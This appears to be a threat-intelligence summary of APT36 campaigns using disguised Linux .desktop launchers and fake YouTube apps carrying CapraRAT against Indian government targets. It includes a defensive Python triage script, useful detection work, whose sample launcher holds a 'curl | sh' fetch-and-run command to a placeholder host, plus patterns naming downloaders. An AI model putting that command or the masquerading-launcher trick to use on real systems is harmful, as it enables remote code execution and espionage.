The Pakistani-linked threat group Transparent Tribe (APT36) is targeting Indian government entities using sophisticated spear-phishing campaigns and weaponized desktop shortcuts on Windows and Linux systems to deploy malware, steal credentials, and maintain persistent access.
Pakistani APT36 hackers are abusing Linux .desktop files to deliver malware and conduct espionage against Indian government and defense targets. Phishing emails carry disguised malicious launcher files that execute hidden commands, establish persistent access, and exfiltrate data, indicating evolving and sophisticated tactics.
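The .desktop abuse described above hinges on a launcher that looks like a document but runs a shell command when opened. As an added example (not code from the original report or from any of the analyses it summarizes), the following Python parses a .desktop file and flags the traits a defender would hunt for; the sample launcher, its file name and the `.invalid` URL are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample of a launcher masquerading as a PDF (not a real artifact).
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://placeholder.invalid/stage | sh & xdg-open /tmp/agenda.pdf"
"""

# A document-like suffix on the display name is the lure; a shell wrapper or
# downloader in Exec is the payload delivery.
DOC_SUFFIX = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)$", re.IGNORECASE)
SHELL_WRAPPER = re.compile(r"\b(ba)?sh\s+-c\b|\bbase64\b|\bcurl\b|\bwget\b")


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [Desktop Entry] group only."""
    entries: Dict[str, str] = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries


def suspicious_indicators(entries: Dict[str, str]) -> List[str]:
    """Heuristic findings for a .desktop file posing as a document."""
    findings: List[str] = []
    name = entries.get("Name", "")
    exec_line = entries.get("Exec", "")
    if DOC_SUFFIX.search(name):
        findings.append("name-mimics-document")
    if SHELL_WRAPPER.search(exec_line):
        findings.append("exec-uses-shell-or-downloader")
        if entries.get("Terminal", "").lower() == "false":
            findings.append("hidden-terminal")  # shell runs with no visible window
    if "/tmp/" in exec_line:
        findings.append("references-tmp")
    return findings


if __name__ == "__main__":
    print(suspicious_indicators(parse_desktop_entry(SAMPLE_DESKTOP)))
```

Run it over `~/.local/share/applications` and the Desktop directory of each user to triage launchers; a benign entry such as `Name=Firefox` / `Exec=firefox %u` produces no findings.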
The APT36 hacking group, also known as Transparent Tribe, has been using fake YouTube apps to infect Android devices with their remote access trojan (RAT), CapraRAT. Once installed, the malware can collect data, record audio and video, and access sensitive information. APT36 primarily targets Indian defense and government entities, as well as individuals involved in Kashmir region affairs and human rights activism in Pakistan. The malicious apps are distributed outside of Google Play and request risky permissions during installation. Despite their weak operational security, APT36's continuous development of new apps allows them to consistently reach new potential victims.